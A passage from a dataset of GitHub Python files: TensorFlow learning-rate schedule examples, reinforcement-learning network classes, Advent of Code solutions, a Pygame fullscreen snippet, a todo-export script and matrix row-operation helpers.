[]\nlr_scehdule.append(lr)\nloss_function = tf.keras.losses.CategoricalCrossentropy()\nfor i in range(30):\n x_batch, y_batch = next(iter(batch_train))\n with tf.GradientTape() as tape:\n # 예측\n output=model(x_batch) \n # loss 계산\u001F\n loss=loss_function(y_batch, output)\n # gradient 계산\n gradients=tape.gradient(loss, model.trainable_variables) #loss에 대해 각 trainable_variables를 편미분\n # 역전파 - weight 업데이트\n\n if i % 5 == 0:\n lr = lr * (down ** np.floor(i / epoch_down_cycle)) \n for k in range(len(model.trainable_variables)):\n model.trainable_variables[k].assign(model.trainable_variables[k] - lr * gradients[k]) \n lr_scehdule.append(lr) \n print(loss)\n\nplt.plot(lr_scehdule)\n#%%\n'''\n3. LearningRateScheduler를 이용한 learning rate 조정(cont)\n - cosine decay restarts\n (초기 lr을 cosine형태로 감소하다가 다시 초기lr의 일정부분만큼 복원시키며 반복)\n'''\n#%%\n'''gradient\n - cosine decay restarts'''\ndecay_steps = 10\nalpha = 1e-5 #최소 lr\nmax_lr = first_lr = 0.1 # maximum learning rate\nlr_schedule = []\n\n\nloss_function = tf.keras.losses.CategoricalCrossentropy()\nfor i in range(60):\n x_batch, y_batch = next(iter(batch_train))\n with tf.GradientTape() as tape:\n # 예측\n output=model(x_batch) \n # loss 계산\u001F\n loss=loss_function(y_batch, output)\n # gradient 계산\n gradients=tape.gradient(loss, model.trainable_variables) #loss에 대해 각 trainable_variables를 편미분\n # 역전파 - weight 업데이트\n if i%decay_steps == 0:\n max_lr=max_lr*0.9\n # lr_schedule.append(max_lr) 실제로 update하지 않았지만 스케쥴에 추가\n lr = max_lr # 주기와 일치하는 반복수에 도착한 경우, 현재 lr을 max_lr로 수정해줌\n for k in range(len(model.trainable_variables)):\n model.trainable_variables[k].assign(model.trainable_variables[k] - lr * gradients[k]) \n lr_schedule.append(lr)\n else: # 반복되는 주기 사이\n # lr_schedule.append(lr)\n for k in range(len(model.trainable_variables)):\n lr= alpha + 0.5*(max_lr - alpha)*( 1 + np.cos(np.pi * (i%decay_steps) / decay_steps)) #decay_steps= 각 주기의 step 수\n model.trainable_variables[k].assign(model.trainable_variables[k] - lr * gradients[k]) \n lr_schedule.append(lr)\n print(loss) \n\nplt.plot(lr_schedule)\n#%%\n'''\n4. LearningRateScheduler를 이용한 learning rate 조정\n - 3 step scheduler (by kaggle Chris Deotte's notebook)\n'''\nLR_START = 1e-5 #초기에 lr start\nLR_MAX = 1e-2 \nLR_RAMPUP_EPOCHS = 5 #올라가는 step\nLR_SUSTAIN_EPOCHS = 10\nLR_STEP_DECAY = 0.75\nlr_schedule=[]\n\nloss_function = tf.keras.losses.CategoricalCrossentropy()\nfor i in range(60):\n x_batch, y_batch = next(iter(batch_train))\n with tf.GradientTape() as tape:\n # 예측\n output=model(x_batch) \n # loss 계산\u001F\n loss=loss_function(y_batch, output)\n # gradient 계산\n gradients=tape.gradient(loss, model.trainable_variables) #loss에 대해 각 trainable_variables를 편미분\n if i < LR_RAMPUP_EPOCHS: # 5번동안 올라감\n lr=LR_START\n lr_schedule.append(lr)\n lr = (LR_MAX - LR_START) / LR_RAMPUP_EPOCHS * i + LR_START # 처음엔 epochs=0 -> LR_START\n # epochs=1 -> (LR_MAX-LR_START)/5*1 + LR_START\n # ''' 4까지 올라감\n for k in range(len(model.trainable_variables)):\n model.trainable_variables[k].assign(model.trainable_variables[k] - lr * gradients[k]) \n \n elif i < LR_RAMPUP_EPOCHS + LR_SUSTAIN_EPOCHS: # 5~ 15 step까지 고정\n lr = LR_MAX\n lr_schedule.append(lr)\n for k in range(len(model.trainable_variables)):\n model.trainable_variables[k].assign(model.trainable_variables[k] - lr * gradients[k]) \n\n else:\n lr_schedule.append(lr)\n lr = LR_MAX * LR_STEP_DECAY**((i - LR_RAMPUP_EPOCHS - LR_SUSTAIN_EPOCHS)//2) \n #15-15 //2 =0 ->0.75의 0승\n #16-15 //2 =0 -> \"\n #17-15 //2 =1 -> 0.75의 1승\n #18일땐 1승 \n for k in range(len(model.trainable_variables)):\n model.trainable_variables[k].assign(model.trainable_variables[k] - lr * gradients[k]) \n print(loss) \nplt.plot(lr_schedule)\n#%%\n''' 번외)\n ReduceLROnPlateau를 이용한 learning rate 조정\n\t- 검증 데이터 기준으로 성능 향상이 없을 때 Learning rate를 동적으로 감소)\n GD가 학습데이터 기준으로 업데이트 -> 검증은 오로지 평가(loss,accuracy)만 담당 -> 진척없다 싶으면 callback해줌\n'''\nfrom tensorflow.keras.callbacks import ReduceLROnPlateau\nreduceLR = ReduceLROnPlateau(\n monitor='val_loss', # val_loss 기준으로 callback 호출\n\tfactor=0.5, # callback 호출시 학습률을 1/2로 줄임\n\tpatience=5, # moniter값의 개선없을 시 5번 인내\n\tmode='min', # moniter: 'loss' -> min\n\tmin_lr=1e-5,\n\tmin_delta=0.01, # 개선된 것으로 간주한 최소한의 변화량\n\tcooldown=2, # 쿨타임\n\tverbose=1\n)\nmodel = image_model()\n\n# 정리\nmodel.compile(optimizer=Adam(0.001), loss='categorical_crossentropy', metrics=['accuracy'])\nhistory = model.fit(x=x_train, y=y_train, batch_size=128, epochs=20, validation_split=0.15, callbacks=[reduceLR])\n\nmodel.evaluate(x_test, y_test, batch_size=128)\n#%%\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"park-jinaa/ordinal_regression","sub_path":"mnist_lrschedule_give.py","file_name":"mnist_lrschedule_give.py","file_ext":"py","file_size_in_byte":10058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15557807268","text":"import tensorflow as tf\nimport numpy as np\nimport utils\n\n#TODO : For every network change train function interface: it should get placeholder names and values as input. Also change initialization(input placeholder must be provaded as well as hidden layer sizes)\n\ntfDtype = tf.float32 \nclass StateValueNetwork:\n \n def __init__(self, sess, inputLength, hiddenLaySizes, learningRate, inputPh, suffix=\"\", orthogonalInitializtion=False):\n self.inputLength = inputLength\n self.hiddenLayers = hiddenLaySizes\n self.sess = sess\n self.suffix = suffix\n self.orthogonalInitializtion = orthogonalInitializtion\n self.input = inputPh\n self._createDefault()\n\n def _createDefault(self):\n with tf.variable_scope(\"StateValueNetwork{}\".format(self.suffix)):\n \n if not self.orthogonalInitializtion:\n curNode = tf.layers.Dense(self.hiddenLayers[0], tf.nn.tanh, kernel_initializer = tf.contrib.layers.xavier_initializer(),name=\"fc1\")(self.input)\n for i,l in enumerate(self.hiddenLayers[1:]):\n curNode = tf.layers.Dense(l, tf.nn.tanh, kernel_initializer = tf.contrib.layers.xavier_initializer(), name=\"fc{}\".format(i+2))(curNode)\n self.output = tf.layers.Dense(1, kernel_initializer = tf.contrib.layers.xavier_initializer(),name=\"output\")(curNode)\n else:\n curNode = tf.layers.Dense(self.hiddenLayers[0], tf.nn.tanh, kernel_initializer=tf.orthogonal_initializer(self.orthogonalInitializtion[0]), name=\"fc1\")(self.input)\n for i,l in enumerate(self.hiddenLayers[1:]):\n curNode = tf.layers.Dense(l, tf.nn.tanh, kernel_initializer=tf.orthogonal_initializer(self.orthogonalInitializtion[i+1]), name=\"fc{}\".format(i+2))(curNode)\n self.output = tf.layers.Dense(1, kernel_initializer=tf.orthogonal_initializer(self.orthogonalInitializtion[-1]), name=\"output\")(curNode)\n \n self.output = tf.squeeze(self.output, 1)\n def forward(self, observations): \n assert (len(observations.shape) == 2 and observations.shape[1] == self.inputLength)\n \n return self.sess.run(self.output, feed_dict = {self.input : observations})\n\nclass QNetwork:\n \n def __init__(self, sess, inputLength, outputLength, hiddenLaySizes, hiddenLayerActivations, inputPh, actionPh, attachActionLayer, suffix, reuse=None):\n self.inputLength = inputLength\n self.outputLength = outputLength\n self.hiddenLayers = hiddenLaySizes\n self.hiddenLayerActivations = hiddenLayerActivations\n self.sess = sess\n self.global_step = tf.Variable(0,dtype = tf.int32)\n self.i = 0\n self.suffix = suffix\n self.input = inputPh\n self.action = actionPh\n self.attachActionLayer = attachActionLayer #to which hidden layer to attach action(0 based indexed)\n self.reuse = reuse\n if len(hiddenLaySizes) <= attachActionLayer:\n print(\"\\nattachActionLayer={} outside of network({} hidden layers)\\n\".format(attachActionLayer, len(hiddenLayerActivations))) \n self._createDefault()\n\n def _createDefault(self):\n if self.reuse is not None:\n with tf.variable_scope(\"QNetwork{}\".format(self.reuse.suffix), reuse = True):\n curNode = tf.layers.Dense(self.hiddenLayers[0], self.hiddenLayerActivations[0], name=\"fc1\")(self.input)\n if(self.attachActionLayer == 0):\n curNode = tf.concat([curNode, self.action], axis = 1)\n for i,l in enumerate(self.hiddenLayers[1:]):\n curNode = tf.layers.Dense(l, self.hiddenLayerActivations[i+1], name=\"fc{}\".format(i+2))(curNode)\n if(self.attachActionLayer == i+1):\n curNode = tf.concat([curNode, self.action], axis = 1, name=\"QNetworkActionConcat\")\n \n self.output = tf.squeeze(tf.layers.Dense(1, self.hiddenLayerActivations[-1], name=\"output\")(curNode),axis=1)\n self.variablesScope = \"QNetwork{}\".format(self.reuse.suffix) \n else: \n with tf.variable_scope(\"QNetwork{}\".format(self.suffix)): \n curNode = tf.layers.Dense(self.hiddenLayers[0], self.hiddenLayerActivations[0], name=\"fc1\")(self.input)\n if(self.attachActionLayer == 0):\n curNode = tf.concat([curNode, self.action], axis = 1)\n for i,l in enumerate(self.hiddenLayers[1:]):\n curNode = tf.layers.Dense(l, self.hiddenLayerActivations[i+1], name=\"fc{}\".format(i+2))(curNode)\n if(self.attachActionLayer == i+1):\n curNode = tf.concat([curNode, self.action], axis = 1, name=\"QNetworkActionConcat\")\n \n self.output = tf.squeeze(tf.layers.Dense(1, self.hiddenLayerActivations[-1], name=\"output\")(curNode),axis=1)\n self.variablesScope = \"QNetwork{}\".format(self.suffix) \n \n def forward(self, observations): \n assert (len(observations.shape) == 2 and observations.shape[1] == self.inputLength)\n \n return self.sess.run(self.output, feed_dict = {self.input : observations})\n \nclass PolicyNetworkDiscrete:\n \n def __init__(self, sess, inputLength, outputLength, hiddenLaySizes, inputsPh, actionsPh, suffix, orthogonalInitializtion=False, layerNorm=True):\n self.inputLength = inputLength\n self.outputLength = outputLength\n self.hiddenLayers = hiddenLaySizes\n self.sess = sess\n self.global_step = tf.Variable(0,dtype = tf.int32)\n self.i = 0\n self.input = inputsPh\n self.actions = actionsPh\n self.suffix = suffix \n self.orthogonalInitializtion = orthogonalInitializtion\n self._createDefault() \n \n def _createDefault(self):\n with tf.variable_scope(\"PolicyNetworkDiscrete{}\".format(self.suffix)):\n \n if not self.orthogonalInitializtion:\n curNode = tf.layers.Dense(self.hiddenLayers[0], tf.nn.tanh, kernel_initializer = tf.contrib.layers.xavier_initializer(), name=\"fc1\")(self.input)\n curNode = tf.contrib.layers.layer_norm(curNode)\n for i,l in enumerate(self.hiddenLayers[1:]):\n curNode = tf.layers.Dense(l, tf.nn.tanh, kernel_initializer = tf.contrib.layers.xavier_initializer(), name=\"fc{}\".format(i+2))(curNode)\n curNode = tf.contrib.layers.layer_norm(curNode)\n self.logits = tf.layers.Dense(self.outputLength, self.hiddenLayerActivations[-1], kernel_initializer = tf.contrib.layers.xavier_initializer(), name=\"ActionsMean\")(curNode)\n else:\n curNode = tf.layers.Dense(self.hiddenLayers[0], tf.nn.tanh, kernel_initializer=tf.orthogonal_initializer(self.orthogonalInitializtion[0]), name=\"fc1\")(self.input)\n curNode = tf.contrib.layers.layer_norm(curNode)\n for i,l in enumerate(self.hiddenLayers[1:]):\n curNode = tf.layers.Dense(l, tf.nn.tanh, kernel_initializer=tf.orthogonal_initializer(self.orthogonalInitializtion[i+1]), name=\"fc{}\".format(i+2))(curNode)\n curNode = tf.contrib.layers.layer_norm(curNode)\n self.logits = tf.layers.Dense(self.outputLength, self.hiddenLayerActivations[-1], kernel_initializer=tf.orthogonal_initializer(self.orthogonalInitializtion[-1]), name=\"ActionsMean\")(curNode)\n \n self.logProbs = tf.nn.log_softmax(self.logits)\n \n self.sampledActions = tf.squeeze(tf.random.categorical(self.logProbs, 1), axis=1)\n self.sampledLogProbs = tf.reduce_sum(tf.one_hot(self.sampledActions, depth = self.outputLength)*self.logProbs)\n \n self.logProbWithCurrParams = tf.reduce_sum(tf.one_hot(tf.squeeze(self.actions,1), depth=self.outputLength)*self.logProbs, axis=1)#log probs for actions given the observation(both fed with placeholder)\n \n \n def getSampledActions(self, inputs): \n return self.sess.run([self.sampledActions, self.sampledLogProbs, self.logProbs], feed_dict = {self.inputs : inputs})\n\n\nclass PolicyNetworkContinuous:\n \n def __init__(self, sess, inputLength, outputLength, hiddenLaySizes, hiddenLayerActivations, inputPh, actionsPh, suffix, actionMeanScale=None, logStdInit=None, logStdTrainable=True, clipLogStd=None, actionClip=None, orthogonalInitializtion=False, layerNorm=True):\n self.inputLength = inputLength\n self.outputLength = outputLength\n self.input = inputPh\n self.actions = actionsPh\n self.hiddenLayers = hiddenLaySizes\n self.hiddenLayerActivations = hiddenLayerActivations\n self.sess = sess\n self.global_step = tf.Variable(0,dtype = tf.int32)\n self.i = 0\n self.clipLogStd = clipLogStd\n self.actionClip = actionClip\n self.actionMeanScale = actionMeanScale\n self.logStdInit = logStdInit\n #this applies only if logStds in not None\n self.logStdTrainable = logStdTrainable\n self.suffix = suffix\n self.variablesScope = \"PolicyNetworkContinuous{}\".format(suffix)\n self.orthogonalInitializtion = orthogonalInitializtion\n self._createDefault()\n \n def _createDefault(self):\n with tf.variable_scope(\"PolicyNetworkContinuous{}\".format(self.suffix)):\n \n if not self.orthogonalInitializtion:\n curNode = tf.layers.Dense(self.hiddenLayers[0], self.hiddenLayerActivations[0], kernel_initializer = tf.contrib.layers.xavier_initializer(), name=\"fc1\")(self.input)\n #curNode = tf.contrib.layers.layer_norm(curNode)\n for i,l in enumerate(self.hiddenLayers[1:]):\n curNode = tf.layers.Dense(l, self.hiddenLayerActivations[i+1], kernel_initializer = tf.contrib.layers.xavier_initializer(), name=\"fc{}\".format(i+2))(curNode)\n #curNode = tf.contrib.layers.layer_norm(curNode)\n self.actionMean = tf.layers.Dense(self.outputLength, self.hiddenLayerActivations[-1],kernel_initializer = tf.contrib.layers.xavier_initializer(), name=\"ActionsMean\")(curNode)\n else:\n curNode = tf.layers.Dense(self.hiddenLayers[0], self.hiddenLayerActivations[0],kernel_initializer=tf.orthogonal_initializer(self.orthogonalInitializtion[0]), name=\"fc1\")(self.input)\n #curNode = tf.contrib.layers.layer_norm(curNode)\n for i,l in enumerate(self.hiddenLayers[1:]):\n curNode = tf.layers.Dense(l, self.hiddenLayerActivations[i+1], kernel_initializer=tf.orthogonal_initializer(self.orthogonalInitializtion[i+1]), name=\"fc{}\".format(i+2))(curNode)\n #curNode = tf.contrib.layers.layer_norm(curNode)\n self.actionMean = tf.layers.Dense(self.outputLength, self.hiddenLayerActivations[-1], kernel_initializer=tf.orthogonal_initializer(self.orthogonalInitializtion[-1]), name=\"ActionsMean\")(curNode)\n \n if(self.actionMeanScale is not None):\n assert(self.actionMeanScale.shape == (1,self.outputLength))\n self.actionMean = self.actionMean * self.actionMeanScale\n\n #logic for noise that is added to action mean\n if self.logStdInit is not None: \n assert(self.logStdInit.shape == (1,self.outputLength)) \n self.actionLogStd = tf.get_variable(name=\"ActionsLogStdDetached{}Trainable\".format(\"\" if self.logStdTrainable else \"Non\"), initializer=self.logStdInit, trainable=self.logStdTrainable)\n else:\n if not self.orthogonalInitializtion: \n self.actionLogStd = tf.layers.Dense(self.outputLength, kernel_initializer = tf.contrib.layers.xavier_initializer(), name=\"ActionsLogStd\")(curNode)\n else:\n self.actionLogStd = tf.layers.Dense(self.outputLength, kernel_initializer=tf.orthogonal_initializer(self.orthogonalInitializtion[-1]), name=\"ActionsLogStd\")(curNode)\n \n if self.clipLogStd is not None:\n self.actionLogStd = tf.clip_by_value(self.actionLogStd, self.clipLogStd[0], self.clipLogStd[1], name=\"ClipedActionsLogStd\")\n\n #here we actualy add noise\n if self.actionLogStd is not None: \n self.actionStd = tf.math.exp(self.actionLogStd) \n self.actionRaw = self.actionMean + tf.random_normal(tf.shape(self.actionMean)) * self.actionStd\n else:\n self.actionRaw = self.actionMean \n \n #action clip\n if self.actionClip is not None: \n assert(self.actionClip.shape == (2, self.outputLength) )\n self.actionFinal = tf.clip_by_value(self.actionFinal, self.actionClip[0,:], self.actionClip[1,:])\n else:\n self.actionFinal = self.actionRaw\n \n #if adding std to action mean, operations for action probabilities\n if self.actionLogStd is not None: \n self.sampledLogProbs = utils.gaussian_likelihood(self.actionFinal, self.actionMean, self.actionLogStd)\n self.logProbWithCurrParams = utils.gaussian_likelihood(self.actions, self.actionMean, self.actionLogStd)#log prob(joint, all action components are from gaussian) for action given the observation(both fed with placeholder)\n \n def getSampledActions(self, observations):\n if self.actionLogStd is not None:\n return self.sess.run([self.actionFinal, self.sampledLogProbs, self.actionMean, self.actionLogStd], feed_dict = {self.input : observations})\n else:\n return self.sess.run([self.actionFinal, self.actionMean], feed_dict = {self.input : observations})\n\n \n \nclass SoftQNetwork:\n \n def __init__(self, sess, inputLength, outputLength, learningRate, alpha, suffix):\n self.inputLength = inputLength\n self.outputLength = outputLength\n self.learningRate = learningRate\n self.sess = sess\n self.alpha = alpha\n self.global_step = tf.Variable(0,dtype = tf.int32)\n self.i = 0\n self.initialized = False\n self.suffix = suffix\n \n def _createDefault(self):\n with tf.variable_scope(\"SoftQNetwork{}\".format(self.suffix)):\n self.input = tf.placeholder(dtype = tfDtype, shape = [None, self.inputLength + self.outputLength], name=\"input\")\n curNode = tf.layers.Dense(120, tf.nn.relu, kernel_initializer= tf.initializers.truncated_normal(), name=\"fc1\")(self.input)\n curNode = tf.layers.Dense(84, tf.nn.relu, kernel_initializer= tf.initializers.truncated_normal(), name=\"fc2\")(curNode)\n self.output = tf.layers.Dense(1, kernel_initializer= tf.initializers.truncated_normal(), name=\"output\")(curNode)\n \n self.target = tf.placeholder(dtype = tfDtype, shape = [None, 1], name=\"target\")\n self.loss = tf.losses.mean_squared_error(self.target, self.output)\n \n self.minimizationOperation = tf.train.AdamOptimizer(learning_rate = self.learningRate).minimize(self.loss, global_step = self.global_step)\n \n def forward(self, observations, actions):\n if not self.initialized:\n self._createDefault()\n init = tf.initialize_local_variables()\n init2 = tf.initialize_all_variables()\n self.sess.run([init,init2])\n self.initialized = True\n \n fullInput = np.concatenate((observations, actions), axis = -1)\n \n return self.sess.run(self.output, feed_dict = {self.input : fullInput})\n \n def train(self, observations, actions, rewards, stateValues, gamma):\n inputs = np.concatenate((observations, actions), axis = -1)\n targets = rewards + gamma*stateValues\n self.global_step = self.global_step + 1\n self.sess.run(self.minimizationOperation, feed_dict = {self.target : targets, self.input : inputs}) ","repo_name":"nspasic96/RL-algorithms","sub_path":"networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":16208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1467643762","text":"if __name__ == \"__main__\":\n with open(\"./inputs/day3.txt\") as f :\n data= f.read().splitlines()\n n=len(data[0])\n rights = [1,3,5,7,1]\n downs = [1,1,1,1,2]\n # print(n,data[:3])\n pos=0\n tree = \"#\"\n n_tree = 0\n\n for line in data[::downs[1]]:\n if line[pos]==tree:\n n_tree+=1\n pos=(pos+rights[1])%n\n print(n_tree)\n\n n_trees=1\n for right,down in zip(rights,downs):\n n_tree = 0\n pos=0\n for line in data[::down]:\n if line[pos]==tree:\n n_tree+=1\n pos=(pos+right)%n\n n_trees*=n_tree\n print(n_trees)\n","repo_name":"Kornflex28/adventofcode2020","sub_path":"code/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7630075993","text":"# How to run Pygame fullscreen on a Chromebook\n# Width and height need to match screen resolution to prevent an error\n\nimport pygame\n\npygame.display.init()\n\nwidth, height = pygame.display.Info().current_w, pygame.display.Info().current_h\nwindow_surface = pygame.display.set_mode((width, height), pygame.FULLSCREEN)\n\nrunning = True\nclock = pygame.time.Clock()\n\n\nwhile running:\n clock.tick(60)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:\n running = False\n\n pygame.display.update()","repo_name":"PBKoning/Python_test_projects","sub_path":"PygameFullScreenOnChromebook/fullscreen_chromebook.py","file_name":"fullscreen_chromebook.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37260393814","text":"import time\n\nDEBUG = 0\n\nif DEBUG:\n\tFILE = 'day12_debug.txt'\nelse:\n\tFILE = 'day12.txt'\n\n\ndef load():\n\twith open(FILE) as file:\n\t\tarr = file.read().rstrip().split('\\n')\n\treturn arr\n\n\ndef parse(data):\n\tgrid = {}\n\tgrid['width'] = len(data[0])\n\tgrid['height'] = len(data)\n\tgrid['possible_start'] = set()\n\tfor row in range(grid['height']):\n\t\tfor col in range(grid['width']):\n\t\t\tgrid[(row, col)] = data[row][col]\n\t\t\tif grid[(row, col)] == 'S':\n\t\t\t\tgrid['start'] = row, col\n\t\t\t\tgrid[(row, col)] = 'a'\n\t\t\telif grid[row, col] == 'E':\n\t\t\t\tgrid[(row, col)] = 'z'\n\t\t\t\tgrid['finish'] = row, col\n\n\t\t\tif grid[(row, col)] == 'a':\n\t\t\t\tgrid['possible_start'].add((row, col))\n\treturn grid\n\n\ndef part_one(grid, max_steps=None):\n\tstart = grid['start']\n\tfinish = grid['finish']\n\n\tvisited = set()\n\tqueue = set()\n\ttemp_queue = set()\n\tqueue.add(start)\n\tvisited.add(start)\n\t# as long as we have locations in the queue, keep going\n\t# if we hit the finish line during the loop, we will break out\n\tsteps = 1\n\twhile queue:\n\t\t# get a location from the queue\n\t\trow, col = queue.pop()\n\n\t\tcurrent = grid[(row, col)]\n\t\tcurrent_height = ord(current)\n\n\t\t# find all neighbors we can move to\n\t\tpossible_moves = set()\n\t\tleft = (row, col-1) if col > 0 else None\n\t\tright = (row, col+1) if col < grid['width'] - 1 else None\n\t\tup = (row-1, col) if row > 0 else None\n\t\tdown = (row+1, col) if row < grid['height'] - 1 else None\n\n\t\tif left and ord(grid[left]) <= current_height + 1:\n\t\t\tpossible_moves.add(left)\n\t\tif right and ord(grid[right]) <= current_height + 1:\n\t\t\tpossible_moves.add(right)\n\t\tif up and ord(grid[up]) <= current_height + 1:\n\t\t\tpossible_moves.add(up)\n\t\tif down and ord(grid[down]) <= current_height + 1:\n\t\t\tpossible_moves.add(down)\n\n\t\t# check all of those whether we already were there (if so, we already have a path to them that was shorter\n\t\tpossible_moves = possible_moves - visited\n\n\t\t# after doing so, check whether that location is the finish line\n\t\tif finish in possible_moves:\n\t\t\treturn steps\n\n\t\t# mark all the moves as visited\n\t\tvisited = visited | possible_moves\n\n\t\t# add all possible moves to a temporary queue we will use for our next step\n\t\ttemp_queue = temp_queue | possible_moves\n\n\t\t# if main queue is empty, we have exhausted all options for our current step\n\t\t# now we add the current temporary queue to the main queue, and empty the temporary queue, so that we can move\n\t\t# to check our next steps\n\t\t# increase step counter while doing that\n\t\tif len(queue) == 0:\n\t\t\tqueue = temp_queue\n\t\t\ttemp_queue = set()\n\t\t\tsteps += 1\n\t\t\tif max_steps is not None and steps > max_steps:\n\t\t\t\treturn None\n\treturn None\n\n\n\ndef part_two(grid):\n\tstart_options = grid['possible_start']\n\tbest_length = None\n\tfor start in start_options:\n\t\tgrid['start'] = start\n\t\tpath_length = part_one(grid, best_length)\n\t\tif best_length is None:\n\t\t\tbest_length = path_length\n\t\telif path_length is not None and path_length < best_length:\n\t\t\tbest_length = path_length\n\treturn best_length\n\n\n\n\nif __name__ == '__main__':\n\tdata = load()\n\tdata = parse(data)\n\tprint(data)\n\n\tstart_time = time.time()\n\tprint('Part One:', part_one(data))\n\tprint(f'--- {time.time() - start_time} seconds ---')\n\t\n\tstart_time = time.time()\n\tprint('Part Two:', part_two(data))\n\tprint(f'--- {time.time() - start_time} seconds ---')\n","repo_name":"Mottschi/Advent_Of_Code_2022","sub_path":"day12.py","file_name":"day12.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7245126335","text":"#!/usr/bin/python3\n'''\nConsume API with Python to export to csv\n'''\nimport json\nimport requests\nif __name__ == \"__main__\":\n export = {}\n url = 'https://jsonplaceholder.typicode.com/users/'\n employees = requests.get(url)\n for i in employees.json():\n employeeID = i['id']\n route = 'https://jsonplaceholder.typicode.com/users/{}/todos'\n url = route.format(employeeID)\n todoByEmployee = requests.get(url)\n\n username = i['username']\n rows = []\n data = {}\n\n for j in todoByEmployee.json():\n data = {}\n data['task'] = j['title']\n data['completed'] = j['completed']\n data['username'] = username\n rows.append(data)\n\n export[employeeID] = rows\n file = '{}.json'.format('todo_all_employees')\n\n with open(file, 'w') as f:\n json.dump(export, f)\n","repo_name":"rayd1893/holberton-system_engineering-devops","sub_path":"0x15-api/3-dictionary_of_list_of_dictionaries.py","file_name":"3-dictionary_of_list_of_dictionaries.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31923683876","text":"# The MatrixOperations class includes a group of methods that allow the matrix to be used for row reduction operations\n# prints out all values stored in the matrix to the console\nimport MatrixExceptions\nfrom MatrixExceptions import RowSizeException\n\n\n# Prints out each value stored in the mateix\ndef printout(a):\n row_string = \"\"\n for row in range(a.get_height()):\n for column in range(a.get_width()):\n row_string += str(a.get_value(row, column)) + \" \"\n print(row_string)\n row_string = \"\"\n\n\n# replaces a row in the matrix with the passed new row\ndef replace_row(A, row_number, new_row):\n matrix_width = A.get_width()\n row_size = len(new_row)\n if row_size > matrix_width:\n raise RowSizeException(\n \"Tried to place a row with {0} elements into a Matrix with only {1} Columns\"\n .format(row_size, matrix_width))\n return\n\n print(\"Setting row {0} to {1}\".format(row_number, new_row))\n A.set_row(row_number, new_row)\n\n\n\"\"\"replaces a column in the matrix with the passed new column\n#Column_number represents the index of the column in the matrix that will be replaced.\n#column_index represents the current index in the new column (the value that is being placed into the matrix)\n# the passed column must have the same number of entries as the number of rows in the matrix\n\"\"\"\n\n\ndef replace_column(A, column_number, new_column):\n new_column_index = 0\n for row in A.get_data():\n row[column_number] = new_column[new_column_index]\n new_column_index += 1\n return\n\n\n# adds a new column on the rightmost side of the matrix\ndef add_column(A, new_column):\n A.set_width(A.get_width() + 1)\n for row in range(A.get_height()):\n A.get_row(row).append(new_column[row])\n\n return\n\n\n# adds a new row to the bottom of the matrix\ndef add_row(A, new_row):\n old_height = A.get_height()\n A.set_height(old_height + 1)\n A.get_data().append(new_row)\n A.set_height(old_height + 1)\n\n\n# changes the stored matrix into a row reduced echelon form\ndef rref(A):\n print(1)\n # does the thing\n ## Step 1: regular echelon form\n # all numbers below pivot are zero\n # all pivots to the right of above pivots\n # all nonzero rows are above all rows of zeros\n # ECHELON LOOP\n # Find the first nonzero column. (column_is_all_zero())\n # pick a number to be the pivot in that column\n # interchange rows to put that number in the first row\n # create all zeros below the pivot\n # That column is done for now. \"Ignore\" that column and the row its in for now.\n # If there are more columns to echelonize, repeat loop.\n\n ##now RREF LOOP\n # now starting with the rightmost pivot, zero the positions above all pivots\n\n # when all columns have zeros above and below pivots, its done! the matrix is in RREF\n\n\n# looks through each row,\n# if it contains all zeroes, interchange it with the lowest nonzero row\ndef put_all_zero_rows_on_bottom(A):\n number_of_zero_rows = 0\n height = A.get_height()\n for row_index in range(height):\n # Only runs if the row index hasn't reached the known rows of all zeros\n if row_index < height - number_of_zero_rows:\n # check if its zero\n if row_is_all_zero(A.get_row(row_index)):\n # if its zero, switch it\n print(\"Row {0} is all zeros\".format(row_index))\n row_interchange(A, height - 1 - number_of_zero_rows, row_index)\n number_of_zero_rows += 1\n # Only re-checks if the row index hasn't reached the known rows of all zeros\n if row_index < height - number_of_zero_rows:\n if row_is_all_zero(A.get_row(row_index)):\n print(\"ITS ALL ZERO AGAIN\")\n # then check to make sure the new one isn't zero as well\n row_interchange(A, height - 1 - number_of_zero_rows, row_index)\n number_of_zero_rows += 1\n\n\n# PAss in a row number! (integer index of the row you are checking to see if its zero)\n# returns true if the passed list contains only 0 elements\ndef row_is_all_zero(row):\n for value in row:\n if value != 0:\n return False\n\n return True\n\n\n# Pass in a \"column\" in the form of a list of integers.\n# Returns true only if every integer in the list is zero\ndef column_is_all_zero(column):\n for number in column:\n if number != 0:\n return False\n\n return True\n\n\n# pass in two row numbers (INTEGERS) those two rows of te matrix will be interchanged with each other\ndef row_interchange(A, row1_index, row2_index):\n print(\"Interchanging rows with index {0}, {1} \".format(row1_index, row2_index))\n temp = A.get_row(row1_index)\n A.set_row(row1_index, A.get_row(row2_index))\n A.set_row(row2_index, temp)\n\n\n# matrix row add operation to add a row into another row\ndef row_add(A, row_index1, row_index2):\n row1 = A.get_row(row_index1)\n row2 = A.get_row(row_index2)\n\n if len(row1) != len(row2): # this should never happen\n print(\"Error! Attempting to add rows of different lengths\")\n return A\n\n for x in range(len(row1)): # both rows have the same legth\n row1[x] += row2[x]\n\n A.set_row(row_index1, row1)\n\n\n# matrix row scale operation, scales the row at A[row_index] by scale factor\ndef row_scale(A, row_index, scale_factor):\n row = A.get_row(row_index)\n for x in range(len(row)):\n row[x] *= scale_factor\n A.set_row(row_index, row)\n\n\n# Scales row 2 and adds it to row 1, but then scales row2 back so that it is unchanged\n# row_index1 and row_index 2 are expected to be integer values < the number of rows in A\ndef row_scaled_add(A, row_index1, row_index2, scale_factor):\n row_scale(A, row_index2, 